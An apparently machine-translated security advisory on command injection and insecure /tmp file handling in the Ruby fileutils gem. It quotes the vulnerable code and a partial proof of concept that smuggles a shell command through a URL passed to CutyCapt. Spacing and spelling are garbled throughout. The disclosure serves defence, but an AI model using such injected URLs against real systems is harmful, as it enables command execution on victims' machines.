RubyGems Fileutils 'file _ utils. rb' Remote Command Execution Vulnerability

RubyGems Fileutils 'file _ utils. rb' Remote Command Execution Vulnerability

Release date:
Updated on:

Affected Systems:
Rubygems Fileutils
Description:
--------------------------------------------------------------------------------
Bugtraq id: 58223

RubyGems Fileutils is a set of tools that extract metadata of various file types.

Fileutils does not properly filter input passed to CutyCapt. Multiple Remote Command Execution Vulnerabilities exist in implementation, and insecure file processing exists in/tmp. Local attackers can exploit this vulnerability to execute arbitrary commands.

<* Source: Larry W. Cashdollar (lwc@vapid.dhs.org)

Link: http://packetstormsecurity.com/files/120579/fileutilsgem-exec.txt
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Possible remote command execution and insecure file handling in/tmp.
2/23/2013

Http://rubygems.org/gems/fileutils

"A set of utility classes to extract meta data from different file types ".

Handles files insecurely in/tmp, a directory is created for that file extension say 'zip' and files are maniplated there. This directory can be hijacked and the contents manipulated by a malicious user.

In./lib/file_utils.rb

15 def zip (target, * sources)
16 targetdir = "{FileUtils: Config. tmp_dir}/zip"
17 id = 1
18 while File. exists? (Targetdir)
19 targetdir = "{FileUtils: Config. tmp_dir}/zip # {id }"
20 id + = 1
21 end
22 FileUtils. mkdir (targetdir)

Where Config. tmp_dir =/tmp

In./lib/file_utils/config. rb

5 def self. tmp_dir
6 @ tmp_dir | = '/tmp'
7 end

Remote command execution:

From file_utils.rb, doesn' t sanitize input on URLs passed to CutyCapt for execution. if a URL contains shell characters say a'; 'followed by a command a remote attacker execute a command on the clients system if they are enticed to click an encoded url like:

Need to test URL encoding not sure if this is valid.

Http://bla.net.org; id>/tmp/o;-> http://tinyurl.com/a5scxzz

7 def capture (url, target)
8 command = FileUtils: Config: Xvfb. command (File. dirname (_ FILE _) + "/.. /bin/CutyCapt -- min-width = 1024 -- min-height = 768 -- url = {url} -- out = {target }")
9' # {command }'
10 end

Partial PoC if client is tricked into using malicious URL:

Irb (main): 001: 0> 'xvfb-run -- server-args = "-screen 768x24 ". /CutyCapt -- url = http://www.example.org; id>/tmp/foo; -- out =/tmp/tempf 'xvfb-run: error: Xvfb failed to start
Sh: 1: -- out =/tmp/tempf: not found
=> ""
Irb (main): 002: 0>

Root @ Ubuntu :~ /CutyCapt/cutycapt/CutyCapt ls-l/tmp/foo-rw-r -- 1 root 39 Feb 27/tmp/foo root @ ubuntu :~ /CutyCapt/cutycapt/CutyCapt cat/tmp/foo uid = 0 (root) gid = 0 (root) groups = 0 (root)
Root @ ubuntu :~ /CutyCapt/cutycapt/CutyCapt #

Michael Scherer of RedHat.com found other issues during a discussion about the above issues I found:

In fact, there is the same similar problem in another file:
Result = '# {FileUtils: Config: OpenOffice. python }#{ command }#{ source }#{ target }#{ FileUtils: Config: OpenOffice. port }'

I quickly checked using irb (a quick command line to type ruby snippet, and yes, using funky chars result in funky results.

There is another issue in
# Generates a temp filepath for the given extension def temp (extension)

Path = "{FileUtils: Config. tmp_dir}/tmp. {extension}" id = 1
While File. exists? (Path)

Path = "{FileUtils: Config. tmp_dir}/tmp. {id}. # {extension }"
Id + = 1

End

Since someone cocould just create the file at the last moment, and make a link so the script wocould overwrite an arbitrary file.

Thanks to vl4dz and Michael.

Larry W. Cashdollar @ _ larry0
Http://vapid.dhs.org & #65279;

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Rubygems
--------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Https://rubygems.org/gems/fileutils